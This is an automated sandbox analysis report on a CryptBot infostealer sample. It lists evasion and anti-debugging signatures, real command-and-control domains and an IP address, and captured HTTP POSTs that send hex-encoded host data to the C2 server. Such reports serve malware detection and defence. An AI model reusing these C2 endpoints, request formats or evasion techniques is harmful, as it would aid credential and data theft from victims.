Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FYQ6Ee6gbS.exe

Overview

General Information

Sample name:FYQ6Ee6gbS.exe
renamed because original name is a hash value
Original sample name:1149dc52a38ac45de7ba2d62192c2918.exe
Analysis ID:1588874
MD5:1149dc52a38ac45de7ba2d62192c2918
SHA1:cb07a903a94b3d04813ae3ce1b24d48ddfb970ed
SHA256:0b7e5470a3e798aeb45bf3e5abfa0873031828744b92ecca69ea3594db368237
Tags:exeuser-abuse_ch
Infos:

Detection

Cryptbot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • FYQ6Ee6gbS.exe (PID: 7508 cmdline: "C:\Users\user\Desktop\FYQ6Ee6gbS.exe" MD5: 1149DC52A38AC45DE7BA2D62192C2918)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CryptBotA typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Malware Configuration

Threatname: Cryptbot

{"C2 list": ["home.fivetj5vs.tops.top", "home.fivetj5vs.top", ".1.1home.fivetj5vs.top", "a.dnspod.coms.top", "gPhome.fivetj5vs.top"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: FYQ6Ee6gbS.exe PID: 7508JoeSecurity_Cryptbot_1Yara detected CryptbotJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-11T06:36:26.951949+010020590181A Network Trojan was detected192.168.2.849706176.53.147.10480TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: FYQ6Ee6gbS.exeAvira: detected
    Antivirus detection for URL or domain
    Source: http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde17361387674fd4Avira URL Cloud: Label: malware
    Source: http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767Avira URL Cloud: Label: malware
    Source: http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde17Avira URL Cloud: Label: malware
    Source: http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767?argument=0Avira URL Cloud: Label: malware
    Source: home.fivetj5vs.topAvira URL Cloud: Label: malware
    Source: gPhome.fivetj5vs.topAvira URL Cloud: Label: malware
    Source: http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767vvIAvira URL Cloud: Label: malware
    Source: http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdAvira URL Cloud: Label: malware
    Source: http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde17361387676963Avira URL Cloud: Label: malware
    Source: .1.1home.fivetj5vs.topAvira URL Cloud: Label: malware
    Found malware configuration
    Source: FYQ6Ee6gbS.exe.7508.1.memstrminMalware Configuration Extractor: Cryptbot {"C2 list": ["home.fivetj5vs.tops.top", "home.fivetj5vs.top", ".1.1home.fivetj5vs.top", "a.dnspod.coms.top", "gPhome.fivetj5vs.top"]}
    Multi AV Scanner detection for submitted file
    Source: FYQ6Ee6gbS.exeVirustotal: Detection: 50%Perma Link
    Source: FYQ6Ee6gbS.exeReversingLabs: Detection: 70%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Machine Learning detection for sample
    Source: FYQ6Ee6gbS.exeJoe Sandbox ML: detected
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: -----BEGIN PUBLIC KEY-----1_2_0024DCF0
    Source: FYQ6Ee6gbS.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: mov dword ptr [ebp+04h], 424D53FFh1_2_0028A5B0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: mov dword ptr [ebx+04h], 424D53FFh1_2_0028A7F0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: mov dword ptr [edi+04h], 424D53FFh1_2_0028A7F0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: mov dword ptr [esi+04h], 424D53FFh1_2_0028A7F0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: mov dword ptr [edi+04h], 424D53FFh1_2_0028A7F0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: mov dword ptr [esi+04h], 424D53FFh1_2_0028A7F0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: mov dword ptr [ebx+04h], 424D53FFh1_2_0028A7F0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: mov dword ptr [ebx+04h], 424D53FFh1_2_0028B560
    Source: FYQ6Ee6gbS.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_0022255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,1_2_0022255D
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002229FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,1_2_002229FF

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2059018 - Severity 1 - ET MALWARE CryptBot CnC Checkin : 192.168.2.8:49706 -> 176.53.147.104:80
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: home.fivetj5vs.tops.top
    Source: Malware configuration extractorURLs: home.fivetj5vs.top
    Source: Malware configuration extractorURLs: .1.1home.fivetj5vs.top
    Source: Malware configuration extractorURLs: a.dnspod.coms.top
    Source: Malware configuration extractorURLs: gPhome.fivetj5vs.top
    Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
    Source: global trafficHTTP traffic detected: POST /enQdvpMCNJgKflSEBdde1736138767 HTTP/1.1Host: home.fivetj5vs.topAccept: */*Content-Type: application/jsonContent-Length: 442324Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 32 38 39 37 34 38 30 38 36 34 34 34 35 33 32 30 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c 2
    Source: global trafficHTTP traffic detected: GET /enQdvpMCNJgKflSEBdde1736138767?argument=0 HTTP/1.1Host: home.fivetj5vs.topAccept: */*
    Source: global trafficHTTP traffic detected: POST /enQdvpMCNJgKflSEBdde1736138767 HTTP/1.1Host: home.fivetj5vs.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
    Source: Joe Sandbox ViewASN Name: VANNINVENTURESGB VANNINVENTURESGB
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002EA8C0 recvfrom,1_2_002EA8C0
    Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
    Source: global trafficHTTP traffic detected: GET /enQdvpMCNJgKflSEBdde1736138767?argument=0 HTTP/1.1Host: home.fivetj5vs.topAccept: */*
    Source: global trafficDNS traffic detected: DNS query: httpbin.org
    Source: global trafficDNS traffic detected: DNS query: home.fivetj5vs.top
    Source: unknownHTTP traffic detected: POST /enQdvpMCNJgKflSEBdde1736138767 HTTP/1.1Host: home.fivetj5vs.topAccept: */*Content-Type: application/jsonContent-Length: 442324Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 32 38 39 37 34 38 30 38 36 34 34 34 35 33 32 30 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c 2
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Sat, 11 Jan 2025 05:36:31 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Sat, 11 Jan 2025 05:36:33 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
    Source: FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde17
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1588443862.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1554004988.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1588443862.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1554004988.00000000014E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde17361387674fd4
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1588443862.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1554004988.00000000014E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde17361387676963
    Source: FYQ6Ee6gbS.exe, FYQ6Ee6gbS.exe, 00000001.00000002.1588481868.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1553280122.00000000014F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767?argument=0
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767http://home.fivetj5vs.top/enQdvpMCNJgKflSEBd
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1588443862.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1554004988.00000000014E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767vvI
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
    Source: FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
    Source: FYQ6Ee6gbS.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
    Source: FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
    Source: FYQ6Ee6gbS.exeString found in binary or memory: https://curl.se/docs/hsts.html#
    Source: FYQ6Ee6gbS.exe, FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
    Source: FYQ6Ee6gbS.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705

    System Summary

    barindex
    PE file contains section with special chars
    Source: FYQ6Ee6gbS.exeStatic PE information: section name:
    Source: FYQ6Ee6gbS.exeStatic PE information: section name: .idata
    Source: FYQ6Ee6gbS.exeStatic PE information: section name:
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_3_01564A291_3_01564A29
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_3_01564A291_3_01564A29
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_3_01564A291_3_01564A29
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_3_01564A291_3_01564A29
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002305B01_2_002305B0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_00236FA01_2_00236FA0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_0025F1001_2_0025F100
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002EB1801_2_002EB180
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_005AE0501_2_005AE050
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_005AA0001_2_005AA000
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002F00E01_2_002F00E0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002862101_2_00286210
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002EC3201_2_002EC320
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002F04201_2_002F0420
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_005744101_2_00574410
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_0022E6201_2_0022E620
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002EC7701_2_002EC770
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_005867301_2_00586730
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_0028A7F01_2_0028A7F0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_005A47801_2_005A4780
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002DC9001_2_002DC900
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_0022A9601_2_0022A960
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002349401_2_00234940
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_004DAAC01_2_004DAAC0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_003F6AC01_2_003F6AC0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_003B4B601_2_003B4B60
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_004DAB2C1_2_004DAB2C
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_0022CBB01_2_0022CBB0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_00598BF01_2_00598BF0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_005ACC901_2_005ACC90
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_005A4D401_2_005A4D40
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_003E0D801_2_003E0D80
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_0059CD801_2_0059CD80
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_0053AE301_2_0053AE30
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_00244F701_2_00244F70
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002EEF901_2_002EEF90
